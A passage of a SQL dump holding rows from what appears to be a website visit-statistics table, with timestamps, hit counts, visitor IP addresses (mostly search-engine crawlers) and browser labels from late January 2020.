7310,1580068205,1,1,0,0,'17.58.101.25','other'),(477311,1580069065,1,1,0,0,'66.249.64.26','chrome'),(477312,1580071028,2,2,0,0,'66.249.64.26','chrome'),(477313,1580071654,1,1,0,0,'157.55.39.157','other'),(477314,1580072274,1,1,0,0,'8.29.198.25','other'),(477315,1580072288,1,1,0,0,'8.29.198.26','other'),(477316,1580072845,2,2,0,0,'66.249.64.28','chrome'),(477317,1580072870,1,1,0,0,'66.249.70.33','chrome'),(477318,1580073390,1,1,0,0,'178.154.171.127','other'),(477319,1580074576,1,1,0,0,'66.249.64.26','chrome'),(477320,1580074926,1,1,0,0,'178.154.171.134','other'),(477321,1580076536,1,1,0,0,'207.46.13.87','other'),(477322,1580077776,2,2,0,0,'157.55.39.231','other'),(477323,1580078477,2,1,1,0,'66.249.64.26',''),(477324,1580079245,1,1,0,0,'66.249.64.28','chrome'),(477325,1580079596,1,1,0,0,'66.249.70.62','chrome'),(477326,1580080786,2,2,0,0,'157.55.39.231','other'),(477327,1580081666,2,2,0,0,'178.154.171.127','other'),(477328,1580081741,2,2,0,0,'178.154.171.134','other'),(477329,1580082168,1,1,0,0,'31.13.103.21','other'),(477330,1580082169,1,1,0,0,'31.13.103.10','other'),(477333,1580082328,1,1,0,0,'157.55.39.231','other'),(477334,1580082680,2,2,0,0,'207.46.13.149','other'),(477335,1580082729,1,1,0,0,'207.46.13.87','other'),(477336,1580083150,1,1,0,0,'66.249.64.28','chrome'),(477337,1580083173,1,1,0,0,'8.29.198.27','other'),(477338,1580083192,1,1,0,0,'8.29.198.25','other'),(477339,1580083200,1,1,0,0,'31.13.103.14','other'),(477340,1580083201,1,1,0,0,'31.13.103.6','other'),(477341,1580085459,1,1,0,0,'157.55.39.157','other'),(477342,1580085598,1,1,0,0,'178.154.171.134','other'),(477343,1580086513,1,1,0,0,'62.205.134.182','other'),(477344,1580086783,1,1,0,0,'207.46.13.149','other'),(477345,1580087098,1,1,0,0,'66.249.64.28','chrome'),(477346,1580087788,1,1,0,0,'178.154.171.134','other'),(477347,1580087870,1,1,0,0,'3.214.184.250','other'),(477348,1580089174,2,2,0,0,'157.55.39.157','other'),(477349,1580089214,1,1,0,0,'178.154.171.127','other'),(477350,1580089257,1,1,0,0,'178.154.171.134','other'),(477351,1580089961,2,2,0,0,'66.249.64.27','chrome'),(477352,1580090472,1,1,0,0,'66.249.64.26','chrome'),(477353,1580092037,3,3,0,0,'66.249.64.26','chrome'),(477354,1580092359,1,1,0,0,'66.249.64.28','chrome'),(477355,1580092927,1,1,0,0,'207.46.13.149','other'),(477356,1580093325,2,2,0,0,'157.55.39.157','other'),(477357,1580094067,2,2,0,0,'8.29.198.27','other'),(477358,1580094260,1,1,0,0,'157.55.39.157','other'),(477359,1580095466,1,1,0,0,'178.154.171.134','other'),(477360,1580095588,1,1,0,0,'66.249.64.27','chrome'),(477361,1580096941,1,1,0,0,'178.154.171.127','other'),(477362,1580097207,1,1,0,0,'66.249.64.26','chrome'),(477363,1580097211,1,1,0,0,'207.46.13.149','other'),(477364,1580098124,3,3,0,0,'178.154.171.134','other'),(477365,1580098400,1,1,0,0,'185.255.134.105','chrome'),(477366,1580098817,2,2,0,0,'207.46.13.149','other'),(477367,1580099472,1,1,0,0,'178.154.171.134','other'),(477368,1580099520,2,2,0,0,'66.249.64.26','chrome'),(477369,1580099689,4,4,0,0,'157.55.39.157','other'),(477370,1580100859,1,1,0,0,'178.154.171.127','other'),(477371,1580100887,1,1,0,0,'178.154.171.134','other'),(477372,1580101179,1,1,0,0,'66.249.64.28','chrome'),(477373,1580101200,2,2,0,0,'66.249.64.27','chrome'),(477374,1580101227,1,1,0,0,'207.46.13.149','other'),(477375,1580101235,2,2,0,0,'66.249.64.26','chrome'),(477376,1580102035,1,1,0,0,'178.154.171.134','other'),(477377,1580102172,1,1,0,0,'91.196.178.146','firefox'),(477378,1580102464,1,1,0,0,'157.55.39.157','other'),(477379,1580102708,1,1,0,0,'66.249.64.26','chrome'),(477380,1580103029,1,1,0,0,'66.249.70.62','chrome'),(477381,1580103579,1,1,0,0,'37.9.113.10','other'),(477382,1580103794,1,1,0,0,'62.205.134.182','other'),(477383,1580104583,1,1,0,0,'89.163.242.241','opera'),(477384,1580104795,2,2,0,0,'66.249.64.27','chrome'),(477385,1580104953,2,2,0,0,'8.29.198.26','other'),(477386,1580106382,1,1,0,0,'157.55.39.157','other'),(477387,1580106449,1,1,0,0,'66.249.64.26','chrome'),(477388,1580107497,2,2,0,0,'207.46.13.149','other'),(477389,1580107586,1,1,0,0,'87.250.224.90','other'),(477390,1580108276,1,1,0,0,'66.249.64.27','chrome'),(477391,1580109954,1,1,0,0,'207.46.13.149','other'),(477392,1580110094,1,1,0,0,'91.196.178.166','chrome'),(477393,1580110204,1,1,0,0,'66.249.64.28','chrome'),(477394,1580110371,1,1,0,0,'66.249.64.26','chrome'),(477395,1580111786,1,1,0,0,'5.3.144.30','other'),(477396,1580111809,1,1,0,0,'157.55.39.157','other'),(477397,1580111877,1,1,0,0,'66.249.64.27','chrome'),(477398,1580111939,1,1,0,0,'66.249.64.28','chrome'),(477399,1580113381,2,2,0,0,'207.46.13.149','other'),(477400,1580113714,2,2,0,0,'66.249.64.28','chrome'),(477401,1580114216,1,1,0,0,'46.201.243.68','msie'),(477402,1580114561,1,1,0,0,'157.55.39.157','other'),(477403,1580115623,1,1,0,0,'207.46.13.149','other'),(477404,1580115663,1,1,0,0,'66.249.64.26','chrome'),(477405,1580115843,2,2,0,0,'8.29.198.27','other'),(477406,1580117497,2,2,0,0,'66.249.64.28','chrome'),(477407,1580117636,1,1,0,0,'66.249.64.26','chrome'),(477408,1580118134,1,1,0,0,'141.8.132.2','other'),(477409,1580118402,1,1,0,0,'13.59.253.48','chrome'),(477410,1580118638,1,1,0,0,'77.111.247.52','chrome'),(477411,1580119221,1,1,0,0,'37.57.23.104','chrome'),(477412,1580120136,3,3,0,0,'66.249.64.26','chrome'),(477413,1580120911,2,2,0,0,'207.46.13.149','other'),(477414,1580121452,1,1,0,0,'92.112.125.65','chrome'),(477415,1580123548,1,1,0,0,'157.55.39.231','other'),(477416,1580123766,1,1,0,0,'66.249.64.27','chrome'),(477417,1580124151,1,1,0,0,'109.74.154.72','chrome'),(477418,1580125235,1,1,0,0,'107.21.1.8','other'),(477419,1580125237,1,1,0,0,'54.208.102.37','other'),(477420,1580126235,1,1,0,0,'95.134.222.85','chrome'),(477421,1580126494,2,2,0,0,'157.55.39.231','other'),(477422,1580126767,1,1,0,0,'8.29.198.25','other'),(477423,1580126893,1,1,0,0,'178.154.171.134','other'),(477424,1580126900,1,1,0,0,'8.29.198.26','other'),(477425,1580127644,1,1,0,0,'207.46.13.149','other'),(477426,1580127805,1,1,0,0,'66.249.64.26','chrome'),(477427,1580127826,1,1,0,0,'157.55.39.231','other'),(477428,1580127924,1,1,0,0,'66.249.64.27','chrome'),(477429,1580128684,2,2,0,0,'31.13.115.7','other'),(477430,1580129012,1,1,0,0,'207.46.13.149','other'),(477431,1580129485,1,1,0,0,'66.249.64.26','chrome'),(477432,1580130369,1,1,0,0,'207.46.13.149','other'),(477433,1580130627,1,1,0,0,'66.249.64.27','chrome'),(477434,1580131896,1,1,0,0,'91.196.178.93','chrome'),(477435,1580131918,2,2,0,0,'157.55.39.231','other'),(477436,1580132235,1,1,0,0,'66.102.9.161','chrome'),(477437,1580132416,1,1,0,0,'157.55.39.157','other'),(477438,1580133197,1,1,0,0,'157.55.39.231','other'),(477439,1580133885,1,1,0,0,'207.46.13.149','other'),(477440,1580133993,1,1,0,0,'93.124.39.2','chrome'),(477441,1580134048,2,2,0,0,'91.196.178.93','chrome'),(477442,1580135174,1,1,0,0,'91.196.178.77','firefox'),(477443,1580135396,1,1,0,0,'46.219.206.214','chrome'),(477444,1580135943,1,1,0,0,'217.117.64.133','firefox'),(477445,1580136147,3,3,0,0,'157.55.39.231','other'),(477446,1580136486,1,1,0,0,'91.196.178.183','chrome'),(477447,1580136665,1,1,0,0,'66.249.64.27','chrome'),(477448,1580136822,1,1,0,0,'46.133.100.216','chrome'),(477449,1580137315,2,2,0,0,'207.46.13.149','other'),(477450,1580137396,2,2,0,0,'213.180.203.75','other'),(477451,1580137539,1,1,0,0,'91.196.178.87','firefox'),(477452,1580137561,1,1,0,0,'91.196.178.183','chrome'),(477453,1580137681,2,2,0,0,'8.29.198.27','other'),(477454,1580138575,2,2,0,0,'66.249.64.26','chrome'),(477455,1580138876,1,1,0,0,'94.179.209.169','chrome'),(477456,1580140472,1,1,0,0,'213.180.203.75','other'),(477457,1580140658,1,1,0,0,'66.249.64.28','chrome'),(477458,1580142204,1,1,0,0,'46.229.60.90','chrome'),(477459,1580143437,1,1,0,0,'207.46.13.149','other'),(477460,1580143532,1,1,0,0,'178.154.171.134','other'),(477461,1580143628,1,1,0,0,'66.249.70.36','chrome'),(477462,1580144459,1,1,0,0,'157.55.39.157','other'),(477463,1580145694,1,1,0,0,'66.249.64.28','chrome'),(477464,1580147598,2,2,0,0,'207.46.13.149','other'),(477465,1580148430,7,7,0,0,'178.62.74.6','chrome'),(477466,1580148708,2,2,0,0,'8.29.198.25','other'),(477467,1580149030,1,1,0,0,'46.211.156.10','chrome'),(477468,1580149057,2,2,0,0,'213.180.203.75','other'),(477469,1580149146,1,1,0,0,'66.249.64.27','chrome'),(477470,1580149558,1,1,0,0,'157.55.39.157','other'),(477471,1580151590,2,2,0,0,'157.55.39.157','other'),(477472,1580152178,1,1,0,0,'66.249.64.28','chrome'),(477473,1580152385,1,1,0,0,'91.196.177.69','chrome'),(477474,1580152922,1,1,0,0,'94.178.147.163','chrome'),(477475,1580152964,1,0,1,0,'66.249.70.62',''),(477476,1580154345,3,3,0,0,'157.55.39.231','other'),(477477,1580154509,1,1,0,0,'207.46.13.149','other'),(477478,1580155708,1,1,0,0,'207.46.13.149','other'),(477479,1580155779,1,1,0,0,'66.249.64.27','chrome'),(477480,1580156759,2,2,0,0,'95.213.141.126','opera'),(477481,1580157243,1,1,0,0,'66.249.64.27','chrome'),(477482,1580158511,1,1,0,0,'91.196.178.15','chrome'),(477483,1580159408,1,1,0,0,'157.55.39.157','other'),(477484,1580159670,1,1,0,0,'8.29.198.26','other'),(477485,1580160197,1,1,0,0,'91.196.178.111','chrome'),(477486,1580160585,1,1,0,0,'8.29.198.27','other'),(477487,1580161275,1,1,0,0,'66.249.64.26','chrome'),(477488,1580163087,1,1,0,0,'157.55.39.157','other'),(477489,1580164488,1,1,0,0,'157.55.39.231','other'),(477490,1580166174,2,2,0,0,'213.180.203.75','other'),(477491,1580167785,1,1,0,0,'213.180.203.75','other'),(477492,1580169255,3,3,0,0,'213.180.203.75','other'),(477493,1580170451,1,1,0,0,'207.46.13.149','other'),(477494,1580170572,1,1,0,0,'8.29.198.25','other'),(477495,1580171638,1,1,0,0,'8.29.198.26','other'),(477496,1580171883,1,1,0,0,'157.55.39.231','other'),(477497,1580172461,1,1,0,0,'207.46.13.149','other'),(477498,1580172915,1,1,0,0,'62.205.134.182','other'),(477499,1580173052,1,1,0,0,'173.252.127.31','other'),(477500,1580173700,1,1,0,0,'213.180.203.75','other'),(477501,1580175123,1,1,0,0,'213.180.203.75','other'),(477502,1580176070,1,1,0,0,'54.186.241.94','other'),(477503,1580176706,1,1,0,0,'66.249.64.26','chrome'),(477504,1580177547,1,1,0,0,'207.46.13.149','other'),(477505,1580177626,1,1,0,0,'213.180.203.75','other'),(477506,1580178878,1,1,0,0,'213.180.203.170','other'),(477507,1580179435,1,1,0,0,'157.55.39.56','other'),(477508,1580179883,1,1,0,0,'213.180.203.75','other'),(477509,1580181481,1,1,0,0,'8.29.198.25','other'),(477510,1580181991,1,1,0,0,'157.55.39.99','other'),(477511,1580182661,1,1,0,0,'8.29.198.27','other'),(477512,1580182823,2,2,0,0,'157.55.39.56','other'),(477513,1580183117,1,1,0,0,'66.249.64.26','chrome'),(477514,1580183215,1,1,0,0,'66.249.64.28','chrome'),(477515,1580184346,1,1,0,0,'46.42.129.196','chrome'),(477516,1580184352,1,1,0,0,'128.72.31.136','chrome'),(477517,1580184489,1,1,0,0,'66.249.64.28','chrome'),(477518,1580184670,1,1,0,0,'157.55.39.56','other'),(477519,1580184762,1,1,0,0,'157.55.39.99','other'),(477520,1580184841,1,1,0,0,'213.180.203.75','other'),(477521,1580185081,1,1,0,0,'157.55.39.231','other'),(477522,1580185895,1,1,0,0,'213.180.203.75','other'),(477523,1580186957,1,1,0,0,'213.180.203.75','other'),(477524,1580187026,1,1,0,0,'66.249.70.36','chrome'),(477525,1580188462,1,1,0,0,'213.180.203.75','other'),(477526,1580188815,1,1,0,0,'207.46.13.238','other'),(477527,1580189667,1,1,0,0,'66.249.64.26','chrome'),(477528,1580190314,1,1,0,0,'213.180.203.75','other'),(477529,1580190354,1,1,0,0,'62.205.134.182','other'),(477530,1580191147,1,1,0,0,'66.249.64.26','chrome'),(477531,1580191173,1,1,0,0,'213.180.203.103','other'),(477532,1580191381,1,1,0,0,'209.17.96.138','other'),(477533,1580192160,2,2,0,0,'91.196.178.93','chrome'),(477534,1580192395,1,1,0,0,'8.29.198.26','other'),(477535,1580192505,1,1,0,0,'66.249.70.36','chrome'),(477536,1580192514,1,1,0,0,'66.249.64.28','chrome'),(477537,1580193180,1,1,0,0,'91.196.178.93','chrome'),(477538,1580193723,1,1,0,0,'8.29.198.25','other'),(477539,1580194059,1,1,0,0,'213.180.203.75','other'),(477540,1580194405,1,1,0,0,'66.249.64.28','chrome'),(477541,1580195161,1,1,0,0,'91.196.178.183','chrome'),(477542,1580195561,1,1,0,0,'86.185.206.44','chrome'),(477543,1580196919,1,1,0,0,'66.249.64.27','chrome'),(477544,1580196938,1,1,0,0,'66.249.64.26','chrome'),(477545,1580196942,1,1,0,0,'157.55.39.99','other'),(477546,1580198861,1,1,0,0,'66.249.64.28','chrome'),(477547,1580198885,1,1,0,0,'91.196.178.85','firefox'),(477548,1580198983,1,1,0,0,'66.249.64.26','chrome'),(477549,1580199026,2,2,0,0,'66.249.70.62','chrome'),(477550,1580201009,1,1,0,0,'91.196.178.85','firefox'),(477551,1580201010,1,1,0,0,'157.55.39.99','other'),(477552,1580201049,1,1,0,0,'66.249.70.62','chrome'),(477553,1580201072,1,1,0,0,'66.249.64.26','chrome'),(477554,1580202772,1,1,0,0,'213.180.203.75','other'),(477555,1580202868,2,2,0,0,'157.55.39.99','other'),(477556,1580203110,1,1,0,0,'66.249.64.27','chrome'),(477557,1580203391,1,1,0,0,'8.29.198.26','other'),(477558,1580203570,1,1,0,0,'178.92.170.175','chrome'),(477559,1580203995,1,1,0,0,'213.180.203.97','other'),(477560,1580204106,1,1,0,0,'213.180.203.170','other'),(477561,1580204757,1,1,0,0,'8.29.198.25','other'),(477562,1580204796,1,1,0,0,'207.46.13.120','other'),(477563,1580204907,1,1,0,0,'54.237.185.141','chrome'),(477564,1580205062,1,1,0,0,'91.196.178.82','chrome'),(477565,1580205243,1,1,0,0,'157.55.39.99','other'),(477566,1580205510,1,1,0,0,'213.180.203.75','other'),(477567,1580205551,1,1,0,0,'213.180.203.103','other'),(477568,1580205702,1,1,0,0,'157.55.39.56','other'),(477569,1580205933,1,1,0,0,'94.179.183.164','firefox'),(477570,1580206426,2,2,0,0,'193.17.44.247','chrome'),(477571,1580207357,1,1,0,0,'91.196.178.93','chrome'),(477572,1580207590,1,1,0,0,'207.46.13.149','other'),(477573,1580208090,1,1,0,0,'86.185.206.44','chrome'),(477574,1580208339,1,1,0,0,'176.111.33.18','firefox'),(477575,1580208405,1,1,0,0,'213.180.203.124','other'),(477576,1580208594,1,1,0,0,'66.249.70.33','chrome'),(477577,1580209263,1,1,0,0,'207.46.13.149','other'),(477578,1580210469,1,1,0,0,'66.249.64.27','chrome'),(477579,1580210475,2,2,0,0,'66.249.64.26','chrome'),(477580,1580210497,1,1,0,0,'109.74.154.72','chrome'),(477581,1580211299,1,1,0,0,'68.183.104.51','msie'),(477582,1580211916,1,1,0,0,'91.209.55.69','chrome'),(477583,1580212100,1,1,0,0,'157.55.39.99','other'),(477584,1580212110,1,1,0,0,'213.180.203.124','other'),(477585,1580212933,2,2,0,0,'157.55.39.56','other'),(477586,1580213827,2,2,0,0,'207.46.13.149','other'),(477587,1580214330,1,1,0,0,'8.29.198.26','other'),(477588,1580214993,1,1,0,0,'213.180.203.124','other'),(477589,1580215445,1,1,0,0,'91.209.11.236','other'),(477590,1580215533,1,1,0,0,'31.13.127.19','other'),(477591,1580215534,1,1,0,0,'31.13.127.18','other'),(477592,1580215709,1,1,0,0,'213.180.203.75','other'),(477593,1580215778,2,2,0,0,'207.46.13.149','other'),(477594,1580215786,2,2,0,0,'66.249.64.26','chrome'),(477595,1580215788,1,1,0,0,'8.29.198.26','other'),(477596,1580216132,1,1,0,0,'157.55.39.99','other'),(477597,1580217870,1,1,0,0,'91.196.177.228','chrome'),(477598,1580217975,1,1,0,0,'141.8.142.115','other'),(477599,1580219111,1,1,0,0,'66.249.70.62','chrome'),(477600,1580219202,1,1,0,0,'66.249.70.33','chrome'),(477601,1580219265,2,2,0,0,'35.243.183.208','other'),(477602,1580219275,2,2,0,0,'66.249.64.26','chrome'),(477603,1580219412,1,1,0,0,'66.249.64.28','chrome'),(477604,1580219519,3,3,0,0,'66.249.64.27','chrome'),(477605,1580219646,1,1,0,0,'31.13.127.5','other'),(477606,1580219648,1,1,0,0,'31.13.127.8','other'),(477607,1580219676,1,1,0,0,'93.171.243.148','chrome'),(477608,1580220365,1,1,0,0,'66.249.64.26','chrome'),(477609,1580220425,1,1,0,0,'66.249.64.28','chrome'),(477610,1580220613,1,1,0,0,'91.196.178.93','chrome'),(477611,1580221896,4,4,0,0,'66.249.64.27','chrome'),(477612,1580221920,2,2,0,0,'66.249.64.26','chrome'),(477613,1580222041,1,1,0,0,'91.196.178.189','chrome'),(477614,1580222419,1,1,0,0,'66.249.64.28','chrome'),(477615,1580222437,1,1,0,0,'66.249.70.33','chrome'),(477616,1580223106,1,1,0,0,'207.46.13.149','other'),(477617,1580224568,2,2,0,0,'207.46.13.149','other'),(477618,1580224651,1,1,0,0,'91.196.178.69','firefox'),(477619,1580225284,1,1,0,0,'8.29.198.26','other'),(477620,1580225396,1,1,0,0,'31.13.127.24','other'),(477621,1580225397,1,1,0,0,'31.13.127.20','other'),(477624,1580225426,1,1,0,0,'213.179.252.150','chrome'),(477625,1580226886,1,1,0,0,'8.29.198.27','other'),(477626,1580229422,2,2,0,0,'207.46.13.118','other'),(477627,1580229627,3,3,0,0,'157.55.39.99','other'),(477628,1580230756,1,1,0,0,'157.55.39.56','other'),(477629,1580230875,1,1,0,0,'157.55.39.99','other'),(477630,1580230951,1,1,0,0,'207.46.13.149','other'),(477631,1580230970,2,2,0,0,'31.13.127.14','other'),(477632,1580231168,1,1,0,0,'141.8.132.28','other'),(477633,1580232468,1,1,0,0,'141.8.142.50','other'),(477634,1580233251,1,1,0,0,'157.55.39.99','other'),(477635,1580233842,1,1,0,0,'165.22.24.71','other'),(477636,1580234193,1,1,0,0,'91.196.178.15','chrome'),(477637,1580235087,1,1,0,0,'194.88.153.145','other'),(477638,1580235449,1,1,0,0,'157.55.39.99','other'),(477639,1580236405,1,1,0,0,'93.124.39.2','chrome'),(477640,1580236451,1,1,0,0,'157.55.39.99','other'),(477641,1580236465,2,2,0,0,'207.46.13.149','other'),(477642,1580236602,1,1,0,0,'8.29.198.27','other'),(477643,1580237585,4,4,0,0,'149.202.82.11','other'),(477644,1580238174,1,1,0,0,'8.29.198.25','other'),(477645,1580238511,160,160,0,0,'149.202.82.11','other'),(477646,1580239626,1,1,0,0,'5.255.253.8','other'),(477647,1580240489,1,1,0,0,'207.46.13.118','other'),(477648,1580240584,31,31,0,0,'192.99.14.130','other'),(477649,1580240972,1,1,0,0,'207.46.13.149','other'),(477650,1580242324,1,1,0,0,'207.46.13.149','other'),(477651,1580243167,1,1,0,0,'77.75.145.67','chrome'),(477652,1580244302,1,1,0,0,'37.9.113.202','other'),(477653,1580245682,1,1,0,0,'207.46.13.60','other'),(477654,1580246391,1,1,0,0,'91.196.178.86','chrome'),(477655,1580246870,2,2,0,0,'66.249.64.27','chrome'),(477656,1580246914,1,1,0,0,'66.249.64.28','chrome'),(477657,1580247247,1,1,0,0,'66.249.64.26','chrome'),(477658,1580247634,1,1,0,0,'8.29.198.25','other'),(477659,1580249008,1,1,0,0,'194.247.173.1','chrome'),(477660,1580249272,1,1,0,0,'8.29.198.26','other'),(477661,1580252382,1,1,0,0,'66.249.64.27','chrome'),(477662,1580252596,1,1,0,0,'207.46.13.149','other'),(477663,1580252614,1,1,0,0,'207.46.13.60','other'),(477664,1580253481,1,1,0,0,'141.8.183.18','other'),(477665,1580255134,1,1,0,0,'207.46.13.149','other'),(477666,1580257047,1,1,0,0,'207.46.13.149','other'),(477667,1580257170,1,1,0,0,'157.55.39.99','other'),(477668,1580257332,1,1,0,0,'207.46.13.60','other'),(477669,1580258628,1,1,0,0,'8.29.198.26','other'),(477670,1580258927,1,1,0,0,'207.46.13.60','other'),(477671,1580259314,1,1,0,0,'62.205.134.182','other'),(477672,1580260330,1,1,0,0,'8.29.198.26','other'),(477673,1580260704,1,1,0,0,'207.46.13.60','other'),(477674,1580261130,1,1,0,0,'207.46.13.149','other'),(477675,1580261661,1,1,0,0,'109.70.106.130','other'),(477676,1580262932,1,1,0,0,'141.8.188.25','other'),(477677,1580265154,1,1,0,0,'95.108.213.3','other'),(477678,1580266046,1,1,0,0,'34.246.198.130','other'),(477679,1580266950,1,0,1,0,'66.249.64.28',''),(477680,1580267733,1,1,0,0,'207.46.13.149','other'),(477681,1580267805,1,1,0,0,'37.9.113.97','other'),(477682,1580268271,1,1,0,0,'141.8.142.128','other'),(477683,1580268552,1,1,0,0,'157.55.39.99','other'),(477684,1580268932,1,1,0,0,'207.46.13.60','other'),(477685,1580269126,1,1,0,0,'95.108.213.61','other'),(477686,1580269479,1,1,0,0,'207.46.13.149','other'),(477687,1580269611,1,1,0,0,'8.29.198.25','other'),(477688,1580269672,2,2,0,0,'157.55.39.99','other'),(477689,1580269875,1,1,0,0,'207.46.13.60','other'),(477690,1580271337,1,1,0,0,'8.29.198.26','other'),(477691,1580271400,1,1,0,0,'207.46.13.60','other'),(477692,1580273252,2,2,0,0,'207.46.13.149','other'),(477693,1580273886,1,1,0,0,'88.154.163.34','chrome'),(477694,1580274420,1,1,0,0,'66.249.64.26','chrome'),(477695,1580274453,1,1,0,0,'87.250.224.90','other'),(477696,1580275515,1,1,0,0,'185.105.90.205','chrome'),(477697,1580276116,1,1,0,0,'207.46.13.149','other'),(477698,1580276191,1,1,0,0,'157.55.39.99','other'),(477699,1580276511,1,1,0,0,'141.8.188.20','other'),(477700,1580276782,1,1,0,0,'62.205.134.182','other'),(477701,1580279007,1,1,0,0,'66.249.70.36','chrome'),(477702,1580279217,1,1,0,0,'66.249.64.26','chrome'),(477703,1580279622,1,1,0,0,'207.46.13.149','other'),(477704,1580280253,1,1,0,0,'66.249.64.28','chrome'),(477705,1580280573,1,1,0,0,'8.29.198.27','other'),(477706,1580281178,1,1,0,0,'185.244.219.121','chrome'),(477707,1580281634,1,1,0,0,'141.8.142.128','other'),(477708,1580282281,1,1,0,0,'8.29.198.27','other'),(477709,1580282854,1,1,0,0,'5.255.253.8','other'),(477710,1580283035,2,2,0,0,'207.46.13.149','other'),(477711,1580283208,2,2,0,0,'157.55.39.99','other'),(477712,1580283397,1,1,0,0,'91.196.178.183','chrome'),(477713,1580284411,2,2,0,0,'213.108.45.138','chrome'),(477714,1580285516,1,1,0,0,'141.8.132.28','other'),(477715,1580285527,1,1,0,0,'141.8.183.33','other'),(477716,1580285745,1,1,0,0,'157.55.39.99','other'),(477717,1580286029,1,1,0,0,'46.200.81.15','chrome'),(477718,1580286282,1,1,0,0,'141.8.188.39','other'),(477719,1580286823,1,1,0,0,'66.249.64.26','chrome'),(477720,1580287164,1,1,0,0,'207.46.13.149','other'),(477721,1580287241,1,1,0,0,'207.46.13.60','other'),(477722,1580287439,2,2,0,0,'157.55.39.99','other'),(477723,1580288040,1,1,0,0,'95.158.31.154','chrome'),(477724,1580289028,1,1,0,0,'13.53.129.80','other'),(477725,1580289720,1,1,0,0,'18.219.201.112','chrome'),(477726,1580290409,1,1,0,0,'128.124.131.116','chrome'),(477727,1580291513,1,1,0,0,'8.29.198.25','other'),(477728,1580293223,1,1,0,0,'8.29.198.25','other'),(477729,1580293489,1,1,0,0,'31.13.127.2','other'),(477730,1580293490,1,1,0,0,'31.13.127.22','other'),(477731,1580293698,1,1,0,0,'207.46.13.149','other'),(477732,1580294139,1,1,0,0,'141.8.132.12','other'),(477733,1580295284,1,1,0,0,'66.249.64.26','chrome'),(477734,1580295331,2,2,0,0,'157.55.39.99','other'),(477735,1580295521,2,2,0,0,'95.213.141.126','opera'),(477736,1580296248,1,1,0,0,'157.55.39.99','other'),(477737,1580296257,1,1,0,0,'66.249.64.28','chrome'),(477738,1580297010,1,1,0,0,'141.8.142.50','other'),(477739,1580297271,1,1,0,0,'207.46.13.149','other'),(477740,1580297781,1,1,0,0,'157.55.39.99','other'),(477741,1580298248,1,1,0,0,'109.74.154.72','chrome'),(477742,1580298375,1,1,0,0,'18.223.108.74','other'),(477743,1580298867,1,1,0,0,'66.249.64.28','chrome'),(477744,1580298970,1,1,0,0,'91.196.178.152','firefox'),(477745,1580299758,1,1,0,0,'91.196.178.68','firefox'),(477746,1580300687,1,1,0,0,'141.8.132.37','other'),(477747,1580300824,1,1,0,0,'66.249.64.26','chrome'),(477748,1580301660,1,1,0,0,'207.46.13.60','other'),(477749,1580302514,1,1,0,0,'8.29.198.25','other'),(477750,1580302685,1,1,0,0,'91.209.11.236','other'),(477751,1580303049,1,1,0,0,'213.180.203.75','other'),(477752,1580303614,1,1,0,0,'141.8.132.12','other'),(477753,1580304355,1,1,0,0,'8.29.198.26','other'),(477754,1580304498,1,1,0,0,'213.180.203.160','other'),(477755,1580305379,1,1,0,0,'207.46.13.60','other'),(477756,1580306345,1,1,0,0,'141.8.142.119','other'),(477757,1580306753,1,1,0,0,'157.55.39.99','other'),(477758,1580307123,1,1,0,0,'37.9.113.39','other'),(477759,1580307182,1,1,0,0,'95.108.213.39','other'),(477760,1580308036,1,1,0,0,'95.158.20.27','chrome'),(477761,1580308557,1,1,0,0,'141.8.132.9','other'),(477762,1580309057,1,1,0,0,'207.46.13.60','other'),(477763,1580309062,1,1,0,0,'195.10.210.70','chrome'),(477764,1580309942,1,1,0,0,'87.250.224.104','other'),(477765,1580310141,1,1,0,0,'5.255.253.8','other'),(477766,1580311163,1,1,0,0,'95.216.96.242','other'),(477767,1580311375,1,1,0,0,'141.8.183.100','other'),(477768,1580312968,1,1,0,0,'91.196.178.92','firefox'),(477769,1580313478,1,1,0,0,'8.29.198.26','other'),(477770,1580314010,1,1,0,0,'37.9.113.6','other'),(477771,1580314247,1,1,0,0,'141.8.188.25','other'),(477772,1580314812,1,1,0,0,'91.196.178.15','chrome'),(477773,1580315082,1,1,0,0,'188.163.83.34','firefox'),(477774,1580315329,1,1,0,0,'8.29.198.25','other'),(477775,1580315466,1,1,0,0,'91.196.178.144','chrome'),(477776,1580315798,1,1,0,0,'107.21.1.8','other'),(477777,1580315801,1,1,0,0,'54.208.102.37','other'),(477778,1580315823,1,1,0,0,'54.161.22.132','other'),(477779,1580315894,1,1,0,0,'141.8.132.31','other'),(477780,1580315916,1,1,0,0,'37.9.113.202','other'),(477781,1580318217,1,1,0,0,'91.196.178.88','chrome'),(477782,1580319036,1,1,0,0,'95.108.213.39','other'),(477783,1580320375,1,1,0,0,'157.55.39.102','other'),(477784,1580320381,1,1,0,0,'66.249.70.33','chrome'),(477785,1580321061,2,2,0,0,'66.249.64.27','chrome'),(477786,1580323251,1,1,0,0,'141.8.183.18','other'),(477787,1580323256,1,1,0,0,'95.108.213.39','other'),(477788,1580324229,2,2,0,0,'66.249.64.27','chrome'),(477789,1580324281,1,1,0,0,'66.249.64.28','chrome'),(477790,1580324316,1,1,0,0,'66.249.64.26','chrome'),(477791,1580324479,1,1,0,0,'8.29.198.26','other'),(477792,1580324511,1,1,0,0,'91.196.178.169','chrome'),(477793,1580325409,1,1,0,0,'37.9.113.6','other'),(477794,1580325928,1,0,1,0,'66.249.70.36',''),(477795,1580326099,3,3,0,0,'66.249.64.26','chrome'),(477796,1580326111,1,1,0,0,'66.249.64.27','chrome'),(477797,1580326122,2,2,0,0,'66.249.70.36','chrome'),(477798,1580326388,1,1,0,0,'8.29.198.26','other'),(477799,1580326411,1,1,0,0,'66.249.64.28','chrome'),(477800,1580326803,1,1,0,0,'5.45.207.87','other'),(477801,1580327203,1,1,0,0,'77.111.244.165','chrome'),(477802,1580327365,1,1,0,0,'91.196.178.34','chrome'),(477803,1580327454,1,1,0,0,'31.43.13.224','other'),(477804,1580328177,1,1,0,0,'178.154.171.127','other'),(477805,1580328265,2,2,0,0,'157.55.39.249','other'),(477806,1580329782,1,1,0,0,'66.249.64.28','chrome'),(477807,1580329783,4,4,0,0,'66.249.64.26','chrome'),(477808,1580329815,1,1,0,0,'66.249.64.27','chrome'),(477809,1580330500,1,1,0,0,'91.209.11.236','other'),(477810,1580331768,1,1,0,0,'157.55.39.102','other'),(477811,1580332810,1,1,0,0,'157.55.39.249','other'),(477812,1580333533,2,2,0,0,'157.55.39.173','other'),(477813,1580334519,2,2,0,0,'157.55.39.173','other'),(477814,1580334793,1,1,0,0,'178.154.171.127','other'),(477815,1580335473,1,1,0,0,'8.29.198.27','other'),(477816,1580336260,1,1,0,0,'178.154.171.134','other'),(477817,1580337359,1,1,0,0,'8.29.198.27','other'),(477818,1580338053,1,1,0